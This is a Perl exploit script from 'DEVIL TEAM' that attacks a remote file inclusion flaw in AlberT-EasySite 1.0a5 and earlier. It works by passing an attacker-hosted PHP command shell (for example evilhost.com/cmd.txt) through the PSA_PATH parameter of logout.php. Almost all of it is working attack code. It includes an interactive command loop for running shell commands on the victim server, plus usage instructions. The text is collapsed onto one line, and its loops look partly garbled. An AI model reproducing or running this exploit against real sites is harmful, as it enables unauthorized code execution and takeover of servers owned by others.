#!/usr/bin/perl use LWP::UserAgent; #/* #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- - - [DEVIL TEAM THE BEST POLISH TEAM] - - #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- AES: AlberT-EasySite <= 1.0a5 Remote File Include Vulnerability #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- [Script name: AES: AlberT-EasySite v. 1.0a5 #- [Script site: http://superalbert.it/download/AlberT-EasySite/ #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Find by: Kacper (a.k.a Rahim) #+ #- Contact: kacper1964@yahoo.pl #- or #- http://www.rahim.webd.pl/ #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Special Greetz: DragonHeart ;-) #- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx #- #!@ Przyjazni nie da sie zamienic na marne korzysci @! #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Z Dedykacja dla osoby, #- bez ktorej nie mogl bym zyc... #- K.C:* J.M (a.k.a Magaja) #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # usage: # perl exploit.pl # # perl exploit.pl http://site.com/[AES_Path]/ http://site.com/cmd.txt cmd # # cmd shell example: # # cmd shell variable: ($_GET[cmd]); # $sciezka = $ARGV[0]; $sciezkacmd = $ARGV[1]; $komenda = $ARGV[2]; if($sciezka!~/http:\/\// || $sciezkacmd!~/http:\/\// || !$komenda){usage()} head(); while() { print "[shell] \$"; while() { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$sciezka.'AES/modules/auth/phpsecurityadmin/include/logout.php?PSA_PATH='.$sciezkacmd.'?&'.$komenda.'='.$cmd)or die "\nCouldNot connect\n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[\n]/[ê]/; if (!$cmd) {print "\nEnter a Command\n\n"; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot executea blank command in /) {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} elsif ($return =~/^.Warning/) {print "\nInvalid Command\n\n"} if($return =~ /(.+).Warning.(.+).Warning/) { $finreturn = $1; $finreturn=~ tr/[ê]/[\n]/; print "\r\n$finreturn\n\r"; last; } else {print "[shell] \$";}}}last; sub head() { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; print "+ - - [DEVIL TEAM THE BEST POLISH TEAM] - - +\n"; print "+ AlberT-EasySite <= 1.0a5 Remote File Include Vulnerability +\n"; print "+ http://www.rahim.webd.pl/ +\n"; print "+ Find by: Kacper (a.k.a Rahim) +\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; } sub usage() { head(); print " Usage: perl exploit.pl \r\n\n"; print " - Full path to AES ex: http://www.site.com/AES/\r\n"; print " - Path to cmd Shell e.g http://www.evilhost.com/cmd.txt\r\n"; print " - Command variable used in php shell \r\n"; print " ============================================================================\r\n"; print " Find by: Kacper (a.k.a Rahim) \r\n"; print " http://www.rahim.webd.pl/ \r\n"; print " Special Greetz: DragonHeart ;-) \r\n"; print " ============================================================================\r\n"; exit(); }